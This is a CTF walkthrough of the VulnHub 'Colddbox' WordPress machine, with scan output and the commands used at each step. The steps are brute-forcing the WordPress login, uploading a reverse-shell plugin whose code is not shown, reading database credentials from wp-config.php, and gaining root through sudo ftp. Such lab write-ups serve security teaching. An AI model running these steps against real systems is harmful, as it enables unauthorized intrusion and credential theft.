Colddbox - Easy

As the machine description says - this is a WordPress machine with an easy level of difficulty. Machine can be found here : vulnhub. It's an interesting room and I enjoyed the Privilege escalation part most.

Enumeration:

1) First I need to discover machines IP. I have used netdiscover and found the IP : 10.0.2.44

netdiscover -i eth0 -r 10.0.0.0/16

2) First, searching all port using nmap: nmap -p- -v -T5 -Pn 10.0.2.44

PORT     STATE SERVICE
80/tcp   open  http
4512/tcp open  unknown

3) Now scanning the services are running: nmap -sV -A -p 80,4512 -v 10.0.2.44

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine
4512/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
|   256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
|_  256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)

4) For Further enumeration, I have used another tool: enum4linux. Nothing found.

enum4linux -v 10.0.2.44

Default web page

5) As the site is running WordPress, so I scan it. This scan gives me valuable info

wpscan -e -v --url http://10.0.2.44/

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress readme found: http://10.0.2.44/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.0.2.44/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
 |  - http://10.0.2.44/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>

[i] No plugins Found.
[i] No DB Exports Found.

[i] User(s) Identified:

[+] the cold in person
 | Found By: Rss Generator (Passive Detection)

[+] hugo
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] c0ldd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] philip
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

6) I need some more info in order to start any attack. So, enumerate the web more. I have tried directory listing using gobuster:

gobuster dir -u http://10.0.2.44/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

===============================================================
/wp-content           (Status: 301) [Size: 311] [--> http://10.0.2.44/wp-content/]
/wp-includes          (Status: 301) [Size: 312] [--> http://10.0.2.44/wp-includes/]
/wp-admin             (Status: 301) [Size: 309] [--> http://10.0.2.44/wp-admin/]   
/hidden               (Status: 301) [Size: 307] [--> http://10.0.2.44/hidden/]     
/server-status        (Status: 403) [Size: 274]       

Exploitation:

7) I have found some interesting directory and username. So first try brute force the /wp-admin login page: wpscan --url http://10.0.2.44 -e u -t 50 -P /usr/share/wordlists/rockyou.txt

This attack give me a - username: c0ldd and password: 9876543210

Now I can log in with them.

8) There are 4 ways to get a reverse shell from the WordPress site.

• Upload shell through the Theme

• Upload shell through the Plugin

• Themes template into 404.php

• Using pre-installed Plugins into header.php

After some googling, I have found 2 well written article about getting a reverse shell. Reading them won't waste your time

• WordPress Shell Upload

• WordPress Plugin: Reverse Shell

I have modified the code below (given my VM IP to connect back) and uploaded as a zip. This code successfully works as a plugin.

Modified shell

9) In my attack box I have started a listener and then just 'Activated' it from WordPress dashboard. And I get user access.

Privilege escalation:

(Failed attempt) I have tried these ways below and failed. So I noted them.

I was able to create folder in /tmp. So downloaded linpeas in /tmp but failed to execute. SUID finding command works: find / -perm -u=s -type f 2>/dev/null, but not useful. Python3 is running there.

10) After so many failed attempt, I have tried the command below. Database leaked some info there: cat wp-config.php | grep DB

define('DB_NAME', 'colddbox');
define('DB_USER', 'c0ldd');
define('DB_PASSWORD', 'cybersecurity');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');

11) DB password could work. So I started to try it, but neither there was any terminal open nor the sudo run access. So then I created a terminal using python3. I have marked them in the picture below

12) Further enumeration says, 3 service running as root: sudo -l

(root) /usr/bin/vim
(root) /bin/chmod
(root) /usr/bin/ftp

13) Running Vim can also give me root access, but I have tried FTP. Running ftp and then /bin/bash.

Thanks for reading. Hope this amazing CTF and write up will help you a lot.